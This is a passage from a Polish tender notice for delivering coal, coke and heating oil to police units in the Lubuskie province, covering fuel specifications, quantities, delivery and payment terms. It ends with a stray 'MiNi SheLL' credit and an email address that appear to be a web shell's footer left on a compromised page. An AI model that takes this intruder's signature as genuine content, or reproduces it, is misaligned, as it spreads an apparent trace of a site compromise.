b)węgiel kamienny wg PN-82/G-97003: 
-wartość opałowa ponad 29.000 kJ/kg, 
-maksymalna zawartość siarki - 0,7 %
-maksymalna zawartość popiołu - 10 %;
c)olej opałowy wg PN-71/C-97012: 
-o wartości opałowej min. 42,6 MJ/kg, 
-maksymalna zawartość siarki - 0,2 %, 
-maksymalna zawartość wody - 100 mg/kg.
4. Planowa łączna ilość opału (dla wszystkich jednostek) wynosi:
a)Węgiel kamienny - 138,100 t
b)Koks - 35,900 t
c)Olej opałowy - 76,000 l
5. Zamawiający zastrzega sobie możliwość zmniejszenia (zwiększenia) zakresu zamówienia w przypadku, gdy  nastąpi wyłączenie (bądź włączenie) danej posesji spod (do) zarządu Zamawiającego w granicach określonych w pkt. III ppkt. 7 SIWZ.
6. Zamawiający dopuszcza możliwość zmiany ilości kupowanego opału (w granicach 20%), w zależności od potrzeb wynikających z warunków atmosferycznych, lub zwiększenia/zmniejszenia zużycia z przyczyn technicznych.
7. Przedmiot zamówienia podzielono na 10 części - (podział terytorialny), w zależności od rodzaju opału i miejsca realizacji przedmiotu zamówienia. - szczegółowy opis części zawiera pkt. IV SIWZ
8. Realizacja dostaw przebiegać będzie etapowo stosownie do potrzeb Zamawiającego. Wielkość każdej dostawy zależeć będzie  od jednostronnych dyspozycji Zamawiającego zgłaszanych telefonicznie, na piśmie, faksem lub drogą elektroniczną. 
9. Wykonawca zobowiązuje się do dostarczania cząstkowych zamówień własnym transportem na swój koszt i ryzyko w ciągu 2 dni roboczych (od poniedziałku do piątku) od zgłoszenia przez pracownika odpowiedniej jednostki Policji woj. lubuskiego, w ilościach określonych w zgłoszeniu, bezpośrednio pod wskazany adres.
10.Za termin dokonania dostawy  uważany będzie  dzień dostarczenia  przedmiotu zamówienia do miejsca wskazanego przez pracownika Zamawiającego w zgłoszeniu  i jego przyjęcia przez upoważnionego pracownika odpowiedniej jednostki Policji woj. lubuskiego.
11.Odbioru dostawy opału dokona upoważniony pracownik danej jednostki  Policji woj. lubuskiego do której dostawa była przeznaczona. Odbiór musi być potwierdzony pisemnie, odpowiednim dokumentem odbioru (protokół odbioru).
12.Realizacja umowy będzie przebiegała etapowo, w miarę potrzeb ze strony Zamawiającego.
13.Zamawiający wymaga gwarancji jakości na okres obowiązywania umowy.
14.Termin płatności - 30 dni od dnia dostarczenia faktury VAT Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 09.11.30.00-4, 09.11.12.10-5, 09.13.51.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com